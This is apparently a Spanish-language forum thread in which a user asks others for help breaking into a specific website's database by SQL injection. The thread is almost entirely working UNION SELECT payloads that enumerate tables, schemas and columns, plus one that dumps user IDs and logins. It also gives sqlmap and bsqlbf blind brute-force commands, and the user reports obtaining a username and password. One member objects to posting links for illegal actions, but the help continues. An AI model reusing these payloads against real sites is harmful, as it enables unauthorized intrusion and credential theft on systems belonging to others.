Probando inyecciones SQL - Columnas ocultas

[Zeioth]

Buenas, me estoy documentando sobre inyecciones SQL. He seguido varios manuales, pero llevo todo el dia atascado en un punto. Asique os pongo los pasos que he seguido, y os pido consejo:

He conseguido obtener el nombre de todas las tablas de la BD:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28table_name%29,4,5,6,7,8,9+from+information_schema.tables--

Sin embargo la consulta que deberia devolver las columnas solo muestra las columnas por defecto de information_schema:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28column_name%29,6,5,6,7,8,9+from+information_schema.columns--

si compruebo las bases de datos que hay, solo veo information_schema y dbro
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28schema_name%29,database%28%29,5,6,7,8,9+from+information_schema.schemata--

con lo cual deduzco que no tengo permisos para ver la BD mysql. Tambien he estado haciendo consultas a ciegas intentando adivinar las columnas de una tabla pero no ha habido suerte:
http://www.miurl.com.br/mi.php?mid=-1+UNION+SELECT+1,2,group_concat%28id%29,6,5,6,7,8,9+from+dbro.cartas--

ENTOCES: Mi pregunta es... Puedo conseguir mas informacion de la BD o llegué a un punto muerto?

[BlackM4ster]

Vas bien, pero, personalmente, suelo usar primero sqlmap para ver si me ahorro trabajo manual, y si no va, pues entonces es cuando me pongo a hacerlo a mano

He pasado Sqlmap y parece que es una bind, asi que a sacar las columnas por diccionario -.-

[engel lex]

hey! si la web no es tuya no andes posteando los links de acciones ilegales en el foro -.-

[Søra]

Antes de ver las columnas tendras que especificar la tabla no?

Código [Seleccionar] Expandir

http://www.miurl.com.br/vcartas.php?mid=-1+UNION+SELECT+1,2,group_concat(column_name),6,5,6,7,8,9+from+information_schema.columns+where+table_name=0x(valorHexDelNombreDeLaTabla)--

un saludo!

[BlackM4ster]

hey! si la web no es tuya no andes posteando los links de acciones ilegales en el foro -.-

Cierto

[Zeioth]

Disculpad, ya esta editado.

BlackM4ster: el sqlmap lo he estado probando pero, no me da nisiquiera el nombre de las tablas, solo el de las BD.

Søra: Esa consulta no funciona porque information_schema.columns no muestra las columnas. Entoces no sirve de nada filtrar

Me surje una duda mas: Para probar consultas a ciegas esto seria correcto o debo indicar el nombre del campo y tabla en hexadecimal? No entiendo muy bien cuando hay que hacerlo en hexadecimal y cuando no es necesario. Un saludo y gracias por la ayuda!:
EJEMPLO: http://www.miurl.br/mi.php?mid=-1+UNION+SELECT+1,2,ID,4,5,6,7,8,9+from+usuarios--

[Søra]

Código [Seleccionar] Expandir

http://www.miurl.com.br/vcartas.php?mid=-1+UNION+SELECT+1,2,group_concat%28id,0x3a,login%29,6,5,6,7,8,9+from+usuarios--

la pass? :O

[BlackM4ster]

BlackM4ster: el sqlmap lo he estado probando pero, no me da nisiquiera el nombre de las tablas, solo el de las BD.

El sqlmap si que da el nombre de las tablas, solo falla en las columnas -.-

[Zeioth]

Ya he sacado el usuario y la contraseña pero no estoy muy contento... Las he terminado adivinando. Quiero probar a hacerlo por fuerza bruta, por aprender. He probado el sbqlfb pero aun no logro que tire.

BlackM4ster He corrido esto, no se si habra algun error...

Código [Seleccionar] Expandir

"python sqlmap.py -u http://www.miurl.com.br/vcartas.php?mid=4203 --tables -D safecosmetics"

Søra Si puedes oculta la url de tus mensajes tambien por favor.  

Probando brute force (sin exito aun):

Código [Seleccionar] Expandir

c:\bsqlbf-v2.1>bsqlbf-v2-1.pl -url http://www.miurl.com.br/vcartas.php?mid=4200 -match "Carta Megalith" -database dbro -sql "select 1"
Creo que el problema puede estar en el match porque la subconsulta que esta haciendo la web devuelve mas de una columna.